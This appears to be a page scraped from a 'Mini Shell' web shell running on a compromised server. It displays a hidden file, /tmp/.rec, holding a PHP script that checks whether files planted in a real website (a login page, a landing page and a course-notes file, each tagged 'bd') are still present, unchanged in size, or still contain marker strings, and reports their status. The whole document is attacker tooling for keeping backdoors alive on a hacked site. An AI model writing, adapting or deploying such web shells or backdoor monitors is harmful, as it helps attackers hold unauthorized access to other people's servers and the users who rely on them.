Mini Shell

Direktori : /tmp/
Upload File :
Current File : //tmp/.rec

<?php   $r = '/home/ukubnwwt/turvalty.com'; $x = ["/css/editCourseNotes.php"=>"bd@@213092@@90",
"/qwg/pj_login.php"=>"bd@@211081@@594",
"/comingsoon_files/landing_page.php"=>"bd@@211095@@1770",
"/qwg/pj_login.php"=>"bd@@211631@@reverse_lookup",
"/comingsoon_files/landing_page.php"=>"bd@@212199@@module_controller"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');